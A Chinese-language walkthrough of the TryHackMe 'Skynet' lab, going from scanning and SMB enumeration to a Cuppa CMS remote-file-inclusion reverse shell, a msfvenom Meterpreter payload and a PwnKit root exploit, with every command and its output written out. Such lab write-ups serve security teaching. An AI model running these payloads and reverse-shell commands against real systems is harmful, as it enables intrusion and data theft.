THM：Skynet[WriteUP]

连接至THM服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用nmap对137端口进行针对性扫描

使用enum4linux对靶机SMB服务进行用户、共享枚举

使用smbclient连接至靶机anonumous共享

使用curl访问靶机80端口

使用ffuf对靶机80端口Web进行路径FUZZ

使用浏览器访问/squirrelmail接口

使用BurpSuite尝试对milesdyson用户进行撞库

使用上述凭证成功登入该用户网页后台面板

边界突破

使用enum4linux通过milesdyson用户SMB服务凭证对SMB共享再次枚举

使用smbclient通过milesdyson用户凭证连接到靶机milesdyson共享

使用浏览器访问/45kra24zxs28v3yd接口

使用ffuf对该接口进行路径FUZZ

使用浏览器访问/45kra24zxs28v3yd/administrator/接口

使用searchsploit搜索该WebAPP

查看该PoC内容

使用curl仿照PoC构造URL进行发包

对Kali自带的php-reverse-shell.php反弹Shell脚本中监听IP与监听端口变量进行修改

使用curl构造URL对本地反弹Shell脚本进行访问

本地侧nc收到反弹Shell回显

特权提升

控制靶机将本地linpeas.sh自动化提权信息扫描脚本进行下载

赋执行权限并运行该脚本

找到Executing Linux Exploit Suggester一栏

查看靶机系统位数

使用msfvenom生成64位的Meterpreter木马

启动Metasplolit

切换到监听模块

查看该模块需要补充的选项

控制靶机将本地shell.elf二进制后门文件进行下载

本地侧MSF收到回显

切换到自动化提权扫描模块

查看该模块需要补充的选项

使用自动提权扫描模块中建议的EXP模块尝试提权

查看该模块需要补充的选项

使用Meterpreter的search功能查找root.txt文件

连接至THM服务器并启动靶机

靶机IP：10.10.118.152

分配IP：10.11.120.102

信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.118.152 -r 1-65535 --ulimit 5000

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -p22,80,110,139,143,445 -sCV 10.10.118.152

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

nmap -p22,80,110,139,143,445 --script=vuln -O 10.10.118.152

使用nmap对靶机常用UDP端口进行开放扫描

nmap -sU --top-ports 20 -Pn 10.10.118.152

使用nmap对137端口进行针对性扫描

nmap -sU -p 137 -sCV --script=vuln 10.10.118.152

使用enum4linux对靶机SMB服务进行用户、共享枚举

enum4linux -U -S 10.10.118.152

使用smbclient连接至靶机anonumous共享

smbclient -L \\\\10.10.118.152\\anonumous

通过浏览该共享，将attention.txt、log1.txt文件下载到本地

查看这两个文件的内容

cat attention.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

cat log1.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

该log1.txt文件看起来像密码列表，因为其中并未出现milesdyson用户名

使用curl访问靶机80端口

curl -I http://10.10.118.152:80

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.118.152:80
HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 12:34:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Tue, 17 Sep 2019 08:58:28 GMT
ETag: "20b-592bbec81c0b6"
Accept-Ranges: bytes
Content-Length: 523
Vary: Accept-Encoding
Content-Type: text/html

使用ffuf对靶机80端口Web进行路径FUZZ

ffuf -u http://10.10.118.152:80/FUZZ -w ../dictionary/Common-dir.txt

使用浏览器访问/squirrelmail接口

使用BurpSuite尝试对milesdyson用户进行撞库

对响应码进行排序找到302响应

账户：milesdyson

密码：cyborg007haloterminator

使用上述凭证成功登入该用户网页后台面板

点击主题为Samba Password reset的邮件获取该用户SMB服务登录密码

账户：milesdyson

密码：)s{A&2Z=F^n_E.B`

边界突破

使用enum4linux通过milesdyson用户SMB服务凭证对SMB共享再次枚举

enum4linux -u 'milesdyson' -p ')s{A&2Z=F^n_E.B`' -S 10.10.118.152

使用smbclient通过milesdyson用户凭证连接到靶机milesdyson共享

smbclient -N \\\\10.10.118.152\\milesdyson -U 'WORKGROUP/milesdyson%)s{A&2Z=F^n_E.B`'

在\notes目录下找到important.txt文件，将其下载到本地

查看important.txt文件内容

cat important.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

根究该文件第一条提示，可知存在接口：/45kra24zxs28v3yd

使用浏览器访问/45kra24zxs28v3yd接口

使用ffuf对该接口进行路径FUZZ

ffuf -u http://10.10.118.152/45kra24zxs28v3yd/FUZZ -w ../dictionary/Common-dir.txt

使用浏览器访问/45kra24zxs28v3yd/administrator/接口

由网页展示可知，该接口使用的WebAPP为Cuppa CMS

使用searchsploit搜索该WebAPP

searchsploit cuppa

searchsploit -m 25971.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 25971.txt
Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
      URL: https://www.exploit-db.com/exploits/25971
     Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
    Codes: OSVDB-94101
Verified: True
File Type: C++ source, ASCII text, with very long lines (876)
Copied to: /home/kali/Desktop/temp/25971.txt

由searchsploit输出可见，该漏洞编号为OSVDB-94101

查看该PoC内容

cat 25971.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat 25971.txt  
# Exploit Title   : Cuppa CMS File Inclusion
# Date            : 4 June 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link   : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version         : Beta
# Tested on       : Window and Linux,--^----------,--------,-----,-------^--,| |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..`+---------------------------^----------|`\_,-------, _________________________|/ XXXXXX /`|     // XXXXXX /  `\   // XXXXXX /\______(/ XXXXXX // XXXXXX /(________(`------'####################################
VULNERABILITY: PHP CODE INJECTION
####################################/alerts/alertConfigField.php (LINE: 22)-----------------------------------------------------------------------------
LINE 22:<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------#####################################################
DESCRIPTION
#####################################################An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]#####################################################
EXPLOIT
#####################################################http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwdMoreover, We could access Configuration.php source code via PHPStreamFor Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------Base64 Decode Output:
-----------------------------------------------------------------------------
<?phpclass Configuration{public $host = "localhost";public $db = "cuppa";public $user = "root";public $password = "Db@dmin";public $table_prefix = "cu_";public $administrator_template = "default";public $list_limit = 25;public $token = "OBqIPqlFWf3X";public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";public $upload_default_path = "media/uploadsFiles";public $maximum_file_size = "5242880";public $secure_login = 0;public $secure_login_value = "";public $secure_login_redirect = "";}
?>
-----------------------------------------------------------------------------Able to read sensitive information via File Inclusion (PHP Stream)################################################################################################################Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################

使用curl仿照PoC构造URL进行发包

curl -v http://10.10.118.152/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

对响应中的BASE64数据进行解码

echo 'PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gInBhc3N3b3JkMTIzIjsKCQlwdWJsaWMgJHRhYmxlX3ByZWZpeCA9ICJjdV8iOwoJCXB1YmxpYyAkYWRtaW5pc3RyYXRvcl90ZW1wbGF0ZSA9ICJkZWZhdWx0IjsKCQlwdWJsaWMgJGxpc3RfbGltaXQgPSAyNTsKCQlwdWJsaWMgJHRva2VuID0gIk9CcUlQcWxGV2YzWCI7CgkJcHVibGljICRhbGxvd2VkX2V4dGVuc2lvbnMgPSAiKi5ibXA7ICouY3N2OyAqLmRvYzsgKi5naWY7ICouaWNvOyAqLmpwZzsgKi5qcGVnOyAqLm9kZzsgKi5vZHA7ICoub2RzOyAqLm9kdDsgKi5wZGY7ICoucG5nOyAqLnBwdDsgKi5zd2Y7ICoudHh0OyAqLnhjZjsgKi54bHM7ICouZG9jeDsgKi54bHN4IjsKCQlwdWJsaWMgJHVwbG9hZF9kZWZhdWx0X3BhdGggPSAibWVkaWEvdXBsb2Fkc0ZpbGVzIjsKCQlwdWJsaWMgJG1heGltdW1fZmlsZV9zaXplID0gIjUyNDI4ODAiOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luID0gMDsKCQlwdWJsaWMgJHNlY3VyZV9sb2dpbl92YWx1ZSA9ICIiOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3JlZGlyZWN0ID0gIiI7Cgl9IAo/Pg==' | base64 -d

数据库：cuppa

账户：root

密码：password123

由于靶机并未将数据暴露在外网中，所以这里尝试通过远程文件包含Getshell

对Kali自带的php-reverse-shell.php反弹Shell脚本中监听IP与监听端口变量进行修改

本地开启一个HTTP服务以便靶机访问该反弹Shell脚本

python -m http.server 8888
#此处切记不可使用`php -S 0:PORT`开启HTTP服务，否则会反弹本地Shell

本地使用nc开始监听反弹Shell脚本中设定的端口

rlwrap -cAr nc -lvnp 1425

使用curl构造URL对本地反弹Shell脚本进行访问

curl http://10.10.118.152/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.11.120.102:8888/php-reverse-shell.php

由python开启的HTTP服务器收到访问请求

┌──(root㉿kali)-[/home/kali/Desktop/WebShell]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.10.118.152 - - [22/Dec/2024 09:21:36] "GET /php-reverse-shell.php HTTP/1.0" 200 -

本地侧nc收到反弹Shell回显

提升TTY

python3 -c 'import pty;pty.spawn("/bin/bash")'

在/home/milesdyson目录下找到user.txt文件

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

www-data@skynet:/home/milesdyson$ ls
ls
backups mail share user.txt

特权提升

控制靶机将本地linpeas.sh自动化提权信息扫描脚本进行下载

curl -O http://10.11.120.102/linpeas.sh

www-data@skynet:/var/www/html/admin$ cd /tmp
cd /tmp
www-data@skynet:/tmp$ ls
ls
systemd-private-e3aa1feddce44ffaa493ef65dc8f48f9-dovecot.service-UAus7R
systemd-private-e3aa1feddce44ffaa493ef65dc8f48f9-systemd-timesyncd.service-YRuskz
www-data@skynet:/tmp$ curl -O http://10.11.120.102/linpeas.sh
curl -O http://10.11.120.102/linpeas.sh
% Total    % Received % Xferd Average Speed   Time    Time     Time Current
                                 Dload Upload   Total   Spent    Left Speed
100 805k 100 805k    0     0   389k      0 0:00:02 0:00:02 --:--:-- 389k
www-data@skynet:/tmp$ ls
ls
linpeas.sh
systemd-private-e3aa1feddce44ffaa493ef65dc8f48f9-dovecot.service-UAus7R
systemd-private-e3aa1feddce44ffaa493ef65dc8f48f9-systemd-timesyncd.service-YRuskz

赋执行权限并运行该脚本

www-data@skynet:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@skynet:/tmp$ ./linpeas.sh
./linpeas.sh

找到Executing Linux Exploit Suggester一栏

发现可能存在的CVE漏洞太多了，一个个手测太慢这里直接用MSF

查看靶机系统位数

uname -a

www-data@skynet:/tmp$ uname -a
uname -a
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

使用msfvenom生成64位的Meterpreter木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.11.120.102 LPORT=1426 -f elf > shell.elf

启动Metasplolit

msfconsole

切换到监听模块

use exploit/multi/handler

查看该模块需要补充的选项

show options

该模块需要补充选项：LHOST、LPORT、PAYLOAD

msf6 exploit(multi/handler) > set LHOST 10.11.120.102
LHOST => 10.11.120.102
msf6 exploit(multi/handler) > set LPORT 1426
LPORT => 1426
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

控制靶机将本地shell.elf二进制后门文件进行下载

curl -O http://10.11.120.102/shell.elf

在靶机中为shell.elf赋执行权限

chmod +x shell.elf

直接在靶机中运行该二进制文件

./shell.elf

本地侧MSF收到回显

将该Meterpreter终端收入会话

background

meterpreter > background
[*] Backgrounding session 2...

切换到自动化提权扫描模块

use post/multi/recon/local_exploit_suggester

查看该模块需要补充的选项

show options

该模块需要补充选项：SESSION

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run

由于网络不稳定，该模块扫一部分后被迫暂停

使用自动提权扫描模块中建议的EXP模块尝试提权

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

查看该模块需要补充的选项

show options

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 10.11.120.102
LHOST => 10.11.120.102
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 1427
LPORT => 1427
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 2
SESSION => 2
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit

成功提权到ROOT用户

使用Meterpreter的search功能查找root.txt文件

search -f root.txt

meterpreter > search -f root.txt
Found 1 result...
=================

Path            Size (bytes) Modified (UTC)
----            ------------ --------------
/root/root.txt 33            2019-09-17 23:41:47 -0400